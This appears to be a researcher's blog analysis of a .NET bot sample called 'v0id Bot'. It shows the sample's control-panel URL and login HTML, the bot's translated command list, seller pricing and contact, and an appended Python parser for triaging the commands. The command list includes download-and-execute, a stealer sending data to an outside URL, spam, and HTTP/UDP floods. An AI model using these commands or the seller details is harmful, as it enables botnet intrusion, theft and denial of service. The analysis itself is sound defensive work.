Yesterday a malware researcher asked me what this sample does.
http://www.virustotal.com/analisis/ec295ccdc2f03cc642a57b60bf1340fcc3ec2b8ecb61b0ee648c9b3bb6af7427-1267604113
It is a .NET application. Online analysis services don't show any malicious activity.
Looking at the strings inside the file reveals a URL.
nexus88.scene-hosting.info/bot/
It is a control panel for something called "v0id Bot".
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>v0id Bot ::: Login</title>
<link href="css/main.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="main">
<center><p class="caption">Login</p>
<form action="index.php" method="post">
<p class="text-norm">
<label> Username</label>
<br />
<input class="txtdborder" type="text" name="user" tabindex="1" />
<br />
<label>Password</label>
<br />
<input class="txtdborder" type="password" name="pw" tabindex="2" />
<br />
<br />
<input class="btndoubleborder" type="submit" name="submit" id="submit" value="Absenden" tabindex="3" />
</p>
</form><br />
<p class="named">Design and Code by RedShark</p>
</center>
</div>
</body>
</html>
But what is "v0id Bot"? Googling for the name returns this result.
http://tool-store.info/?page_id=52
It seems to be a new bot, probably of German origin.

Here is a translation of the function list:
(+) stop bot -> specific bot -> [end] pcname
(+) stop all bots -> [endall]
(+) open website (hidden) -> [run] www.google.de number
(+) open website (hidden) -> [visit] www.google.de number
(+) download & execute -> [dl] www.server.com/serv.exe 1 (1=execute 0=download only)
(+) switch to host until next reboot -> [host] website
(+) display computername -> [pcname]
(+) e-mail spam/bombing -> [spam] youremail@mail.ru victim@mail.ru Subject Body SMTP PORT Mailpass
(+) stealer (No-ip,DynDns & Filezilla) -> [steal] yourwebsite.com/send.php
(+) HTTP Flood -> [http] www.google.de intervalinms threads
(+) UDP Flood -> [udp] host port threads sockets
Price:
v0id Bot Builder FUD = 10 PSC
v0id Bot Builder FUD + 2 FUD Stubs Update = 20 PSC
Gold -> v0id Bot Builder FUD + Unlimited FUD Stubs + Support = 50 PSC
Contact: 560281951
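A triage sketch for analysts, added here and not taken from the bot or the original post: it recognises the command tokens from the function list above in text lines (for example decoded panel responses or sandbox logs) and labels each with an impact class. The page does not show how commands travel on the wire, so the one-command-per-line, whitespace-separated layout, the argument key names, the impact labels and the sample lines are all assumptions constructed for this example.

```python
import re

# token -> (function from the translated list, impact class, argument names).
# Tokens and argument order follow the list above; impact classes and the
# argument key names are labels assumed for this example.
COMMANDS = {
    "end":    ("stop bot", "control", ["pcname"]),
    "endall": ("stop all bots", "control", []),
    "run":    ("open website (hidden)", "clickfraud", ["url", "number"]),
    "visit":  ("open website (hidden)", "clickfraud", ["url", "number"]),
    "dl":     ("download & execute", "payload", ["url", "execute"]),
    "host":   ("switch to host until next reboot", "control", ["website"]),
    "pcname": ("display computername", "recon", []),
    "spam":   ("e-mail spam/bombing", "spam", ["from", "to", "subject", "body", "smtp", "port", "mailpass"]),
    "steal":  ("stealer", "theft", ["url"]),
    "http":   ("HTTP flood", "ddos", ["url", "interval_ms", "threads"]),
    "udp":    ("UDP flood", "ddos", ["host", "port", "threads", "sockets"]),
}

TOKEN_RE = re.compile(r"\[(%s)\]\s*(.*)" % "|".join(COMMANDS), re.IGNORECASE)

def parse_command(line):
    """Return a dict describing the first known command in line, or None."""
    m = TOKEN_RE.search(line)
    if not m:
        return None
    token = m.group(1).lower()
    name, impact, arg_names = COMMANDS[token]
    raw = m.group(2).strip()
    # Free-text fields (spam subject/body) may hold spaces, so keep raw_args too.
    return {"token": token, "function": name, "impact": impact,
            "args": dict(zip(arg_names, raw.split())), "raw_args": raw}

def triage(lines):
    """Parse every line and return the recognised commands in input order."""
    return [cmd for cmd in map(parse_command, lines) if cmd]

# Constructed sample lines (not captured traffic); hosts are placeholders.
SAMPLE = [
    "[dl] files.example.test/serv.exe 1",
    "[udp] 192.0.2.10 80 4 16",
    "[http] www.example.test 500 8",
    "[pcname]",
    "GET /index.html [notacommand] x",
]

if __name__ == "__main__":
    for cmd in triage(SAMPLE):
        print(f"{cmd['impact']:10} {cmd['function']:32} {cmd['args']}")
```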